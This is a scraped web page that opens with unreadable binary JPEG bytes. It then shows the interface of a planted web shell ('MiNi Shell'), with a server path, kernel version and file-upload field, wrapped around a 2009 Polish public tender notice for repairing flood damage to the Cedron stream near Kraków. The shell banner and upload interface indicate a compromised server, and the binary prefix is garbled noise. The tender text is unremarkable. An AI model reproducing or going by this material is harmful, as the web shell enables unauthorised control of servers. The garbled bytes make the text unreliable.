JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/98246-N-2009.html

<p class="kh_header"><b>Kraków: Usuwanie szkód powodziowych na
potoku Cedron w km 15+798 - 16+100 - Przebudowa koryta potoku Cedron
w km 15+798 - 16+100.</b><br>
<b>Numer ogłoszenia: 98246 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych , ul. Szlak 73, 31-153 Kraków, woj. małopolskie, tel. 012 6344033, faks 012 6188010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie szkód powodziowych na
potoku Cedron w km 15+798 - 16+100 - Przebudowa koryta potoku Cedron
w km 15+798 - 16+100..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont koryta potoku Cedron w km 15+798 -
16+100 w ramach usuwania szkód powodziowych zlokalizowany w miejscowości
Leśnica, gmina Stryszów i miejscowości Lanckorona, gmina Lanckorona, powiat
wadowicki. //
Inwestycja będzie realizowana na podstawie pozwolenia na budowę Wojewody
Małopolskiego nr 120/06 znak: RR.XII.7111-14-6-06 z dnia 31.08.2006r. i
dokumentacji projektowej MGGP S.A. z Tarnowa.//
Zakres robót obejmuje:
- roboty pomiarowe przy liniowych robotach ziemnych,
- wycinka drzew i krzewów,/
- remont istniejących opasek z koszy siatkowo - kamiennych na obu brzegach
potoku w km 15+798 - 16+100,/
- odbudowę (odtworzenie) trzech stopni - bystrzy na geowłókninie w km 15+942,
16+018, 16+072 w celu wyrównania spadków podłużnych i powstrzymania erozji
dennej, stopnie - bystrza składają się z dwóch ścian gurtów siatkowo - kamiennych o kształcie zbliżonym do obrysu koryta, przestrzenie między gurtami wypełniane będą narzutem kamienym licowanym,/
- wykonanie umocnienia dna gurtami z koszy siatkowo - kamiennych w km 15+830,
15+867, 15+905, 15+982, 16+045./
- plantowanie skarp i dna potoku,/
- obsiew mieszankami traw skarp potoku.//
Szczegółowy opis przedmiotu zamówienia zawiera załączona dokumentacja
projektowa - załączniki do siwz: przedmiar robót i szczegółowe specyfikacje
techniczne wykonania i odbioru robót (SST)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wysokości 8 000,00 zł ( słownie: osiem tysięcy 00/100 zł) należy wnieść
przed upływem terminu składania ofert.
Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r.)
Wadium wnoszone w pieniądzu należy przelać na rachunek KREDYT BANK PBI
S.A. II O / KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie
Zamawiającego w Krakowie ul. Szlak 73 sekretariat ( I piętro ).
Dowód wpłaty wadium należy dołączyć do oferty.
2.2 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące
wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w
Krakowie,
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym
zobowiązuje się on do bezwarunkowej wypłat kwoty wadium na pierwsze żądanie
Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek
wymienionych w art. 46 ust 5 Ustawy.
- w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia
ma obejmować zobowiązania gwaranta (poręczyciela) z tytułów związanych
z postępowaniem o udzielenie zamówienia działań lub zaniechań określonych w
art. 46 ust. 5 Ustawy każdego z tych wykonawców
- okres ważności wadium nie może być krótszy niż okres związania ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w
postępowaniu, o których mowa w art. 22 ust. 1 Ustawy oraz nie podlegają
wykluczeniu na podstawie art. 24 Ustawy, w szczególności:
1. posiadają uprawnienia do wykonywania działalności lub czynności, o której
mowa w przedmiocie zamówienia, jeżeli ustawy nakładają obowiązek
posiadania takich uprawnień;//
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia tzn.
a) wykonali co najmniej 1 zamówienie w okresie ostatnich pięciu lat przed dniem
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i
wartością ( wartość 1 roboty nie mniejsza niż 500 000,00 zł - słownie:
pięćset tysięcy 00/100 złotych) robotom budowlanym stanowiącym przedmiot
zamówienia. Za roboty budowlane odpowiadające swoim rodzajem
Zamawiający uznaje roboty w zakresie regulacji rzek i potoków lub usuwania
szkód powodziowych na potokach.
b) dysponują sprzętem i urządzeniami niezbędnymi do wykonania zamówienia,
w szczególności: co najmniej: koparka 1 szt., spycharka 1 szt., samochód
ciężarowy 1 szt.
c) dysponują osobami posiadającymi kwalifikacje konieczne do realizacji
zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 ( tj.
Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest kierownik budowy
posiada uprawnienia odpowiednie do wykonywania robót wodnomelioracyjnych
oraz jest członkiem Okręgowej Izby Inżynierów Budownictwa
Uprawnienia jakie musi posiadać kierownik budowy - jedne zwymienionych:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
techniczno - budowlanej: inżynieria wodna lub melioracje wodne, nadane z
mocy § 4, 6, 7, 9 Zarządzenia Prezesa Centralnego Urzędu Gospodarki
Wodnej i Ministrów Żeglugi oraz Rolnictwa z dnia 1.09.1964 r. (Dz. Bud. Nr 17
z dnia 19.09.1964 r.),
- uprawnienia budowlane do pełnienia samodzielnej funkcji kierownika budowy
w specjalności konstrukcyjno - inżynieryjnej w zakresie budowli
hydrotechnicznych obejmujących również ujęcia wód oraz budowle basenów
wodnych i zbiorników wodnych przemysłowych lub melioracji wodnych,
nadane z mocy § 13 ust. 1 pkt 3 lit. d lub pkt 5 Rozporządzenia Ministra
Gospodarki Terenowej i Ochrony Środowiska z dnia 20 lutego 1975 r. w
sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 8, poz.
46),
- uprawnienia budowlane do kierowania robotami budowlanymi bez
ograniczeń w specjalności konstrukcyjno - budowlanej wraz ze specjalizacją
techniczno - budowlaną obejmującą obiekty budowlane gospodarki wodnej,
nadane z mocy art. 13 ust. 1 pkt 2, art. 14 ust. 1 pkt 2 ustawy z dnia 7 lipca
1994 r. - prawo budowlane (tekst jednolity Dz.U. z 2003 r., nr 207, poz. 2016 z
późn. zmianami),
- uprawnienia budowlane do kierowania robotami budowlanymi w ograniczonym
zakresie w specjalności konstrukcyjno - budowlanej dla osób z wyższym
wykształceniem technicznym o kierunku: inżynieria środowiska, nadane z
mocy § 5 ust. 2 pkt 2 i ust. 3 Rozporządzenia Ministra Gospodarki
Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie
samodzielnych funkcji technicznych w budownictwie (Dz. U. z 1995 r. Nr 8,
4 poz.38).//
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia, tj.:
a) ich obroty za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności
jest krótszy - za ten okres (na podstawie rachunku zysków i strat) w
wysokości nie mniejszej niż 1 000 000 zł brutto.//
b) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej
działalności gospodarczej na kwotę minimum stanowiącą wartość
złożonej oferty./
4. nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy;//

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca w celu potwierdzenia, że posiada uprawnienia do wykonywania
określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie
art. 24 Ustawy jest zobowiązany do złożenia w ofercie:
A) Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek
posiadania koncesji, zezwolenia lub licencji na podjęcie działalności
gospodarczej w zakresie objętym zamówieniem publicznym;/
B) Aktualnego odpisu z właściwego rejestru lub aktualnego zaświadczenia o
wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy
wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności
gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem
terminu składania ofert./
C) Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz
właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca
nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych
nie wcześniej niż 3 miesiące przed upływem terminu składania ofert./
D) Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym
w art. 24 ust 1 pkt. 4-8 Ustawy, wystawionej nie wcześniej niż 6 miesięcy
przed upływem terminu składania ofert./
E) Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym
w art. 24 ust.1 pkt 9 Ustawy, wystawionej nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert./
F) Oświadczenie Wykonawcy sporządzonego zgodnie z drukiem stanowiącym
załącznik nr 2 do siwz - OŚWIADCZENIE WYKONAWCY//
3. Wykonawca w celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz
dysponowania potencjałem technicznym i osobami zdolnymi do wykonania
zamówienia jest zobowiązany do złożenia w ofercie:
A) Wykazu wykonanych zamówień w okresie ostatnich 5 lat przed dniem
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, zamówień odpowiadających swoim
rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z
podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem
dokumentów potwierdzających, że zostały wykonane należycie.
Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 3 do
siwz - WYKAZ ZREALIZOWANYCH ZAMÓWIEŃ./
B) Wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi
dysponuje wykonawca. Wykaz należy sporządzić zgodnie z drukiem
stanowiącym załącznik nr 5 do siwz - WYKAZ SPRZĘTU TECHNICZNEGO.
Do wykazu należy dołączyć kserokopię dokumentu potwierdzającego tytuł
prawny sprzętu, a w wypadku gdy sprzęt nie jest własnością Wykonawcy -
umowę najmu, dzierżawy, leasingu lub pisemne zobowiązanie podmiotu
udostępniającego sprzęt o jego użyczeniu Wykonawcy dla potrzeb realizacji
zamówienia będącego przedmiotem niniejszego postępowania./
C) Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu
zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a
także zakresu wykonywanych przez nich czynności. Wykaz należy sporządzić
zgodnie z drukiem stanowiącym załącznik nr 4 do siwz - WYKAZ OSÓB I
PODMIOTÓW.
Jeżeli osoby wyszczególnione w wykazie nie są zatrudnione przez wykonawcę
w oparciu o umowy o pracę należy do wykazu dołączyć pisemne
zobowiązanie podmiotu udostępniającego swoich pracowników, że udostępni
swoich pracowników Wykonawcy dla potrzeb realizacji zamówienia będącego
przedmiotem niniejszego postępowania, a w wypadku osób fizycznych
oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu
zamówienia po stronie wykonawcy./
D) Dokumentów stwierdzających, że osoby, które będą uczestniczyć w
wykonywaniu zamówienia, posiadają wymagane uprawnienia oraz należą do
Okręgowej Izby Inżynierów Budownictwa.//
4. Wykonawca w celu potwierdzenia warunku znajdowania się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia jest
zobowiązany do przedłożenia następujących dokumentów:
A) wypełniony formularz, stanowiący załącznik nr 6 do siwz - INFORMACJA
O OBROTACH./
B) Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że
Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności gospodarczej.//
5. W wypadku, gdy kilku Wykonawców wspólnie ubiega się o zamówienie publiczne,
do oferty należy załączyć wszystkie dokumenty jak w ust. 2, 3 i 4 (i odpowiednio
w ust. 6) z tym, że dokumenty wskazane w ust. 2 muszą być wystawione na
każdego z Wykonawców osobno. Oświadczenie z art. 22 Ustawy może być
złożone przez każdego z Wykonawców z osobna zgodnie z drukiem określonym
w załączniku nr 2 lub złożone wspólnie zgodnie z drukiem określonym w
załączniku nr 2. Dokumenty muszą być podpisane przez osoby uprawnione do
reprezentowania Wykonawców.
6.1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa:
1) w ust. 2 lit B), C) i E) składa dokument lub dokumenty wystawione w kraju, w
którym ma siedzibę, lub miejsce zamieszkania, potwierdzające odpowiednio,
że
A) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
B) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie
społeczne i zdrowotne albo, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu,
C) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
2) w ust 2 lit. D) składa zaświadczenie właściwego organu sądowego lub
administracyjnego kraju pochodzenia albo zamieszkania osoby, której
dokumenty dotyczą w zakresie określonym wart 24 ust 4 - 8 Ustawy.
6.2 dokumenty, o których mowa powyżej w ust. 6.1 pkt 1) lit A) i C) oraz w ust. 2)
muszą być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert;
6.3 Dokument, o którym mowa powyżej w ust. 6.1 pkt 1) lit. B) oraz ust 2 musi być
wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6.4 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej
tj. w ust. 6.1, zastępuje się je dokumentem zawierającym oświadczenie złożone
przed notariuszem, właściwym organem sądowym, administracyjnym albo
organem samorządu zawodowego lub gospodarczego odpowiednio kraju
pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce
zamieszkania. Oświadczenie takie nie może być wystawione wcześniej niż
odpowiednio 6 i 3 miesiące przed upływem terminu składania ofert (odpowiednio
do wskazanych w ust. 6.2 i 6.3 terminów wystawienia dokumentu, który
oświadczenie ma zastąpić)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych, ul. Szlak 73, 31-153 Kraków,  pokój nr 47.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 10:00, miejsce: Małopolski Zarząd Melioracji i Urządzeń Wodnych, ul. Szlak 73, 31-153 Kraków,  sekretariat,I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com